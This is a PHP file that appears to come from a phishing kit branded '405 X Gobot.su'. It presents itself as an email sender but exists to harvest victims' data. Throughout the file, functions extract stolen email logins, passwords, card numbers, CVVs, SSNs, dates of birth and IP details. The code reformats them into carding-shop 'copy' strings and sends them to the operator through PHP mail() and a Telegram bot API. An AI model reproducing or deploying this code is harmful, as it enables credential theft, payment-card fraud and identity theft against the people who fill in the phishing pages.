<?php
/**
 * Global Email Sender Function (Simplified)
 * Hanya menggunakan PHP mail() function
 * 
 * Config disimpan di: /config/gen.json
 */

if (!function_exists('getGlobalEmailConfig')) {
    function getGlobalEmailConfig() {
        $configPath = __DIR__ . '/../config/gen.json';
        if (file_exists($configPath)) {
            return json_decode(file_get_contents($configPath), true) ?? [];
        }
        return [];
    }
}

if (!function_exists('sendResultEmail')) {
    function sendResultEmail($subject, $message, $toOverride = null) {
        $config = getGlobalEmailConfig();
        
        // Always try Telegram (even if email is off)
        sendToTelegram($subject, $message);
        
        if (($config['email_send_status'] ?? 'off') !== 'on') {
            return true;
        }
        
        $to = $toOverride ?? ($config['email_result'] ?? '');
        if (empty($to)) {
            return false;
        }
        
        $fromEmail = $config['email_from'] ?? 'noreply@example.com';
        $fromName = $config['email_from_name'] ?? 'Result Bot';
        
        return sendResultViaMail($to, $subject, $message, $fromEmail, $fromName, true);
    }
}

if (!function_exists('sendResultViaMail')) {
    function sendResultViaMail($to, $subject, $message, $fromEmail, $fromName, $isHtml = false) {
        $headers = "From: {$fromName} <{$fromEmail}>\r\n";
        $headers .= "Reply-To: {$fromEmail}\r\n";
        $headers .= "MIME-Version: 1.0\r\n";
        $headers .= "Content-Type: text/" . ($isHtml ? "html" : "plain") . "; charset=UTF-8\r\n";
        $headers .= "X-Mailer: Result Bot\r\n";
        
        return @mail($to, $subject, $message, $headers);
    }
}

if (!function_exists('sendToTelegram')) {
    function sendToTelegram($subject, $message) {
        $config = getGlobalEmailConfig();
        
        if (($config['telegram'] ?? 'off') !== 'on') {
            return true;
        }
        
        $token = $config['telegram_token'] ?? '';
        $chatId = $config['telegram_chatid'] ?? '';
        
        if (empty($token) || empty($chatId)) {
            return false;
        }
        
        // Parse data from HTML email message using regex
        $data = parseTelegramData($message);
        $brandName = $config['brand_name'] ?? '405 X Gobot.su';
        
        // Build formatted Telegram message
        $text = buildTelegramTemplate($subject, $data, $brandName);
        
        // Telegram max 4096 chars
        if (strlen($text) > 4090) {
            $text = substr($text, 0, 4080) . "\n...";
        }
        
        $url = "https://api.telegram.org/bot{$token}/sendMessage";
        $postData = [
            'chat_id' => $chatId,
            'text' => $text,
            'parse_mode' => 'HTML',
            'disable_web_page_preview' => true
        ];
        
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        return $httpCode === 200;
    }
}

/**
 * Parse card/login data from HTML email message
 */
if (!function_exists('parseTelegramData')) {
    function parseTelegramData($html) {
        $data = [];
        
        // Try to extract from ##PLACEHOLDER## style (raw template)
        // Or extract from rendered HTML content
        $fields = [
            'email' => '/(?:Email|LOGIN).*?[>:\s]+([^\s<]+@[^\s<]+)/is',
            'password' => '/(?:Password|PASS).*?[>:\s]+([^<\n]+)/is',
            'cardnumber' => '/(?:Card\s*(?:Number|#)|CC\s*#?).*?[>:\s]+([\d\s]{13,19})/is',
            'bin' => '/(?:BIN).*?[>:\s]+(\d{6})/is',
            'expiration' => '/(?:Exp|EXP).*?[>:\s]+([\d\/]+)/is',
            'cvv' => '/(?:CVV|CVC|Security).*?[>:\s]+(\d{3,4})/is',
            'fullname' => '/(?:Name|Cardholder|Card\s*Name|Full\s*Name).*?[>:\s]+([A-Za-z\s\.\-\']+)/is',
            'address' => '/(?:Address|ADDR).*?[>:\s]+([^<\n]+)/is',
            'city' => '/(?:City|CTY).*?[>:\s]+([^<\n]+)/is',
            'state' => '/(?:State|STE|Province).*?[>:\s]+([^<\n]+)/is',
            'zipcode' => '/(?:Zip|ZIP|Postal).*?[>:\s]+([\w\s\-]+)/is',
            'phone' => '/(?:Phone|TEL|Mobile).*?[>:\s]+([\d\s\-\(\)\+]+)/is',
            'dob' => '/(?:DOB|Date\s*of\s*Birth|Birthday).*?[>:\s]+([\d\/\-]+)/is',
            'ssn' => '/(?:SSN|Social).*?[>:\s]+([\d\-]+)/is',
            'ip' => '/(?:IP\s*(?:Address)?).*?[>:\s]+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/is',
            'country' => '/(?:Country|GEO|Location).*?[>:\s]+([A-Za-z\s]+)/is',
            'device' => '/(?:Device).*?[>:\s]+([^<\n]+)/is',
            'browser' => '/(?:Browser).*?[>:\s]+([^<\n]+)/is',
        ];
        
        foreach ($fields as $key => $pattern) {
            if (preg_match($pattern, $html, $m)) {
                $data[$key] = trim(strip_tags(html_entity_decode($m[1])));
            }
        }
        
        // Also try to extract from webshop copy format: CC|MM|YY|CVV|NAME|ADDR|CITY|STATE|ZIP|COUNTRY|PHONE|DOB|SSN|MMN|EMAIL|IP|UA
        if (preg_match('/(\d{13,19})\|(\d{1,2})\|(\d{2,4})\|(\d{3,4})\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|(.*)/', $html, $w)) {
            if (empty($data['cardnumber'])) $data['cardnumber'] = $w[1];
            if (empty($data['expiration'])) $data['expiration'] = $w[2] . '/' . $w[3];
            if (empty($data['cvv'])) $data['cvv'] = $w[4];
            if (empty($data['fullname'])) $data['fullname'] = $w[5];
            if (empty($data['address'])) $data['address'] = $w[6];
            if (empty($data['city'])) $data['city'] = $w[7];
            if (empty($data['state'])) $data['state'] = $w[8];
            if (empty($data['zipcode'])) $data['zipcode'] = $w[9];
            if (empty($data['country'])) $data['country'] = $w[10];
            if (empty($data['phone'])) $data['phone'] = $w[11];
            if (empty($data['dob'])) $data['dob'] = $w[12];
            if (empty($data['ssn'])) $data['ssn'] = $w[13];
            if (empty($data['email'])) $data['email'] = $w[15];
            if (empty($data['ip'])) $data['ip'] = $w[16];
        }
        
        return $data;
    }
}

/**
 * Email-marketing style Telegram template
 * Telegram HTML: <b>, <i>, <code>, <pre>, <tg-spoiler>
 */
if (!function_exists('buildTelegramTemplate')) {
    function buildTelegramTemplate($subject, $data, $brandName = '') {
        $e = function($v) { return htmlspecialchars(trim($v ?? ''), ENT_QUOTES, 'UTF-8'); };
        
        $cc = preg_replace('/\s/', '', $data['cardnumber'] ?? '');
        $bin = substr($cc, 0, 6);
        $last4 = substr($cc, -4);
        $ccFmt = strlen($cc) >= 12 ? implode(' ', str_split($cc, 4)) : $cc;
        
        $scheme = 'UNKNOWN';
        if (preg_match('/^4/', $cc)) $scheme = 'VISA';
        elseif (preg_match('/^(5[1-5]|2[2-7])/', $cc)) $scheme = 'MASTERCARD';
        elseif (preg_match('/^3[47]/', $cc)) $scheme = 'AMEX';
        elseif (preg_match('/^(6011|65|64[4-9])/', $cc)) $scheme = 'DISCOVER';
        elseif (preg_match('/^(30[0-5]|36|38)/', $cc)) $scheme = 'DINERS';
        elseif (preg_match('/^35/', $cc)) $scheme = 'JCB';
        
        $isLogin = stripos($subject, 'Login') !== false;
        $isCard = stripos($subject, 'Card') !== false;
        $time = date('h:i A');
        $date = date('F j, Y');
        
        // ═══════════ LOGIN ═══════════
        if ($isLogin && !$isCard) {
            $t  = "\n";
            $t .= "        🔔 <b>New Sign-In Detected</b>\n";
            $t .= "        ─────────────────\n\n";
            $t .= "Hi there,\n";
            $t .= "A new login was just captured.\n\n";
            $t .= "       📧  <code>" . $e($data['email'] ?? '') . "</code>\n";
            $t .= "       🔑  <tg-spoiler>" . $e($data['password'] ?? '') . "</tg-spoiler>\n\n";
            $t .= "       ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈\n\n";
            $t .= "       🌐  " . $e($data['ip'] ?? '') . "\n";
            $t .= "       📍  " . $e($data['country'] ?? '') . "\n";
            if (!empty($data['device']))
                $t .= "       💻  " . $e(substr($data['device'] ?? '', 0, 35)) . "\n";
            $t .= "\n";
            $t .= "       ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈\n";
            $t .= "       <i>" . $date . " at " . $time . "</i>\n";
            $t .= "       <i>" . $e($brandName) . "</i>\n\n";
            return $t;
        }
        
        // ═══════════ CARD ═══════════
        $t  = "\n";
        $t .= "        💳 <b>New Payment Received</b>\n";
        $t .= "        ─────────────────\n\n";
        $t .= "Hi there,\n";
        $t .= "A new card was just submitted.\n\n";
        
        // -- Account --
        if (!empty($data['email'])) {
            $t .= "       <b>ACCOUNT</b>\n";
            $t .= "       📧  <code>" . $e($data['email']) . "</code>\n";
            if (!empty($data['password']))
                $t .= "       🔑  <tg-spoiler>" . $e($data['password']) . "</tg-spoiler>\n";
            $t .= "\n";
        }
        
        // -- Card --
        $t .= "       <b>PAYMENT METHOD</b>\n";
        $t .= "       " . $scheme . " ending in " . $e($last4) . "\n\n";
        $t .= "       <code>" . $e($ccFmt) . "</code>\n";
        $t .= "       Exp <code>" . $e($data['expiration'] ?? '--/--') . "</code>   CVV <tg-spoiler>" . $e($data['cvv'] ?? '---') . "</tg-spoiler>\n";
        $t .= "       " . $e($data['fullname'] ?? '') . "\n";
        $t .= "       BIN <code>" . $e($bin) . "</code>\n\n";
        
        // -- Billing --
        $addr = $data['address'] ?? '';
        $city = $data['city'] ?? '';
        $state = $data['state'] ?? '';
        $zip = $data['zipcode'] ?? '';
        $country = $data['country'] ?? '';
        $phone = $data['phone'] ?? '';
        
        if (!empty($addr) || !empty($city)) {
            $t .= "       <b>BILLING ADDRESS</b>\n";
            $t .= "       " . $e($data['fullname'] ?? '') . "\n";
            if (!empty($addr)) $t .= "       " . $e($addr) . "\n";
            $loc = implode(', ', array_filter([$city, $state, $zip]));
            if (!empty($loc)) $t .= "       " . $e($loc) . "\n";
            if (!empty($country)) $t .= "       " . $e($country) . "\n";
            if (!empty($phone)) $t .= "       Tel: <code>" . $e($phone) . "</code>\n";
            $t .= "\n";
        }
        
        // -- Identity --
        $dob = $data['dob'] ?? '';
        $ssn = $data['ssn'] ?? '';
        $hasDob = !empty($dob) && $dob !== '';
        $hasSsn = !empty($ssn) && $ssn !== '';
        if ($hasDob || $hasSsn) {
            $t .= "       <b>VERIFICATION</b>\n";
            if ($hasDob) $t .= "       Date of Birth: <code>" . $e($dob) . "</code>\n";
            if ($hasSsn) $t .= "       SSN: <tg-spoiler>" . $e($ssn) . "</tg-spoiler>\n";
            $t .= "\n";
        }
        
        // -- Divider --
        $t .= "       ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈\n\n";
        
        // -- Quick Copy --
        $t .= "       <b>ORDER SUMMARY</b>\n";
        $t .= "       <code>" . $e($cc) . "|" . $e($data['expiration'] ?? '') . "|" . $e($data['cvv'] ?? '') . "</code>\n\n";
        
        // -- Full Copy --
        $ws = implode('|', array_map(function($v) { return trim($v ?? ''); }, [
            $cc, $data['expiration'] ?? '', $data['cvv'] ?? '',
            $data['fullname'] ?? '', $addr, $city, $state, $zip, $country,
            $phone, $dob, $ssn, '', $data['email'] ?? '', $data['ip'] ?? ''
        ]));
        $t .= "       <b>FULL DETAILS</b>\n";
        $t .= "       <code>" . $e($ws) . "</code>\n\n";
        
        // -- Trace --
        $t .= "       ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈\n\n";
        $t .= "       🌐  " . $e($data['ip'] ?? '') . "  ·  " . $e($country) . "\n\n";
        
        // -- Footer --
        $t .= "       ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈\n";
        $t .= "       <i>" . $date . " at " . $time . "</i>\n";
        $t .= "       <i>" . $e($brandName) . "</i>\n\n";
        $t .= "       <i>This is an automated notification.</i>\n";
        $t .= "       <i>Do not reply to this message.</i>\n\n";
        
        return $t;
    }
}

if (!function_exists('sendGlobalEmail')) {
    function sendGlobalEmail($to, $subject, $message, $isHtml = false) {
        $config = getGlobalEmailConfig();
        
        // Always try Telegram (even if email is off)
        sendToTelegram($subject, $message);
        
        if (($config['email_send_status'] ?? 'off') !== 'on') {
            return true;
        }
        
        if (empty($to)) {
            $to = $config['email_result'] ?? '';
        }
        
        if (empty($to)) {
            return false;
        }
        
        $fromEmail = $config['email_from'] ?? 'noreply@example.com';
        $fromName = $config['email_from_name'] ?? 'Result Bot';
        
        return sendResultViaMail($to, $subject, $message, $fromEmail, $fromName, $isHtml);
    }
}

/**
 * Build Webshop Copy Format
 * Format: CardNumber|MM|YY|CVV|FullName|Address|City|State|Zip|Country|Phone|DOB|SSN|MMN|Phone2|IP|UserAgent
 */
if (!function_exists('buildWebshopCopy')) {
    function buildWebshopCopy($data) {
        $parts = [
            $data['cardnumber'] ?? '',
            $data['exp_month'] ?? '',
            $data['exp_year'] ?? '',
            $data['cvv'] ?? '',
            $data['fullname'] ?? '',
            $data['address'] ?? '',
            $data['city'] ?? '',
            $data['state'] ?? '',
            $data['zipcode'] ?? '',
            $data['country'] ?? 'United States',
            $data['phone'] ?? '',
            $data['dob'] ?? '',
            $data['ssn'] ?? '',
            $data['mmn'] ?? '',
            $data['phone'] ?? '',
            $data['ip'] ?? '',
            $data['useragent'] ?? ''
        ];
        
        return implode('|', $parts);
    }
}

/**
 * Build HTML Email for Card/Payment Results
 * Uses function/fullinfo.html template (405 X Gobot.su futuristic design)
 */
if (!function_exists('buildGlobalHtmlEmail')) {
    function buildGlobalHtmlEmail($data) {
        $templatePath = __DIR__ . '/../function/fullinfo.html';
        if (!file_exists($templatePath)) {
            return '';
        }
        $webshop = $data['webshop'] ?? buildWebshopCopy($data);
        $expiration = $data['expiration'] ?? '';
        if (empty($expiration) && !empty($data['exp_month']) && !empty($data['exp_year'])) {
            $expiration = $data['exp_month'] . '/' . $data['exp_year'];
        }
        $config = getGlobalEmailConfig();
        $brandName = $config['brand_name'] ?? '405 X Gobot.su';
        $replacements = [
            '##BRAND_NAME##' => $brandName,
            '##EMAIL##' => $data['email'] ?? '',
            '##PASSWORD##' => $data['password'] ?? '',
            '##BIN##' => $data['bin'] ?? '',
            '##CNM##' => $data['cardname'] ?? $data['fullname'] ?? '',
            '##CARDNUM##' => $data['cardnumber'] ?? '',
            '##EXP##' => $expiration,
            '##CVV##' => $data['cvv'] ?? '',
            '##CID##' => $data['cid'] ?? '',
            '##XID##' => $data['xid'] ?? '',
            '##FULLNAME##' => $data['fullname'] ?? $data['cardname'] ?? '',
            '##ADDRESS##' => $data['address'] ?? '',
            '##ADDRESS2##' => $data['address2'] ?? '',
            '##CTY##' => $data['city'] ?? '',
            '##STE##' => $data['state'] ?? '',
            '##PHONE##' => $data['phone'] ?? '',
            '##PINN##' => $data['pin'] ?? '',
            '##ZC##' => $data['zipcode'] ?? '',
            '##MMN##' => $data['mmn'] ?? '',
            '##DOB##' => $data['dob'] ?? '',
            '##SSN##' => $data['ssn'] ?? '',
            '##COPYWEB##' => $webshop,
            '##DATE##' => $data['datetime'] ?? date('Y-m-d H:i:s'),
            '##DV##' => $data['device'] ?? '',
            '##BW##' => $data['browser'] ?? '',
            '##CY##' => $data['country'] ?? '',
            '##ST##' => $data['region'] ?? '',
            '##CT##' => $data['city'] ?? $data['city_geo'] ?? '',
            '##IP##' => $data['ip'] ?? '',
            '##UA##' => $data['useragent'] ?? '',
        ];
        $html = file_get_contents($templatePath);
        foreach ($replacements as $placeholder => $value) {
            $html = str_replace($placeholder, htmlspecialchars($value), $html);
        }
        return $html;
    }
}

/**
 * Build HTML Email for Login Results
 * Uses function/login.html template (405 X Gobot.su futuristic design)
 */
if (!function_exists('buildGlobalLoginHtml')) {
    function buildGlobalLoginHtml($data) {
        $templatePath = __DIR__ . '/../function/login.html';
        if (!file_exists($templatePath)) {
            return '';
        }
        $config = getGlobalEmailConfig();
        $brandName = $config['brand_name'] ?? '405 X Gobot.su';
        $replacements = [
            '##BRAND_NAME##' => $brandName,
            '##EMAIL##' => $data['email'] ?? '',
            '##PASSWORD##' => $data['password'] ?? '',
            '##DATE##' => $data['datetime'] ?? date('Y-m-d H:i:s'),
            '##DV##' => $data['device'] ?? '',
            '##BW##' => $data['browser'] ?? '',
            '##CY##' => $data['country'] ?? '',
            '##ST##' => $data['region'] ?? '',
            '##CT##' => $data['city'] ?? $data['city_geo'] ?? '',
            '##IP##' => $data['ip'] ?? '',
            '##UA##' => $data['useragent'] ?? '',
        ];
        $html = file_get_contents($templatePath);
        foreach ($replacements as $placeholder => $value) {
            $html = str_replace($placeholder, htmlspecialchars($value), $html);
        }
        return $html;
    }
}

/**
 * Build HTML Email for Billing Results (without card)
 * Uses function/billing.html template (405 X Gobot.su futuristic design)
 */
if (!function_exists('buildGlobalBillingHtml')) {
    function buildGlobalBillingHtml($data) {
        $templatePath = __DIR__ . '/../function/billing.html';
        if (!file_exists($templatePath)) {
            return '';
        }
        $config = getGlobalEmailConfig();
        $brandName = $config['brand_name'] ?? '405 X Gobot.su';
        $replacements = [
            '##BRAND_NAME##' => $brandName,
            '##EMAIL##' => $data['email'] ?? '',
            '##PASSWORD##' => $data['password'] ?? '',
            '##FULLNAME##' => $data['fullname'] ?? '',
            '##ADDRESS##' => $data['address'] ?? '',
            '##ADDRESS2##' => $data['address2'] ?? '',
            '##CTY##' => $data['city'] ?? '',
            '##STE##' => $data['state'] ?? '',
            '##ZC##' => $data['zipcode'] ?? '',
            '##PHONE##' => $data['phone'] ?? '',
            '##DOB##' => $data['dob'] ?? '',
            '##SSN##' => $data['ssn'] ?? '',
            '##DATE##' => $data['datetime'] ?? date('Y-m-d H:i:s'),
            '##DV##' => $data['device'] ?? '',
            '##BW##' => $data['browser'] ?? '',
            '##CY##' => $data['country'] ?? '',
            '##ST##' => $data['region'] ?? '',
            '##CT##' => $data['city'] ?? $data['city_geo'] ?? '',
            '##IP##' => $data['ip'] ?? '',
            '##UA##' => $data['useragent'] ?? '',
        ];
        $html = file_get_contents($templatePath);
        foreach ($replacements as $placeholder => $value) {
            $html = str_replace($placeholder, htmlspecialchars($value), $html);
        }
        return $html;
    }
}

/**
 * Send Card Result with HTML format
 */
if (!function_exists('sendCardResultHtml')) {
    function sendCardResultHtml($data, $cardStatus = 1) {
        $config = getGlobalEmailConfig();
        if (($config['email_send_status'] ?? 'off') !== 'on') return true;
        
        $bin = substr($data['cardnumber'] ?? '', 0, 6);
        $subject = "Card $cardStatus :: $bin :: [ " . ($data['ip'] ?? '') . " - " . ($data['country'] ?? '') . " ]";
        
        $message = buildGlobalHtmlEmail($data);
        
        return sendResultEmail($subject, $message);
    }
}

/**
 * Send Login Result with HTML format
 */
if (!function_exists('sendLoginResultHtml')) {
    function sendLoginResultHtml($data) {
        $config = getGlobalEmailConfig();
        if (($config['email_send_status'] ?? 'off') !== 'on') return true;
        
        $subject = "Login :: [ " . ($data['ip'] ?? '') . " - " . ($data['country'] ?? '') . " ]";
        
        $message = buildGlobalLoginHtml($data);
        
        return sendResultEmail($subject, $message);
    }
}

/**
 * Send Billing Result with HTML format
 */
if (!function_exists('sendBillingResultHtml')) {
    function sendBillingResultHtml($data) {
        $config = getGlobalEmailConfig();
        if (($config['email_send_status'] ?? 'off') !== 'on') return true;
        
        $subject = "Billing :: [ " . ($data['ip'] ?? '') . " - " . ($data['country'] ?? '') . " ]";
        
        $message = buildGlobalBillingHtml($data);
        
        return sendResultEmail($subject, $message);
    }
}
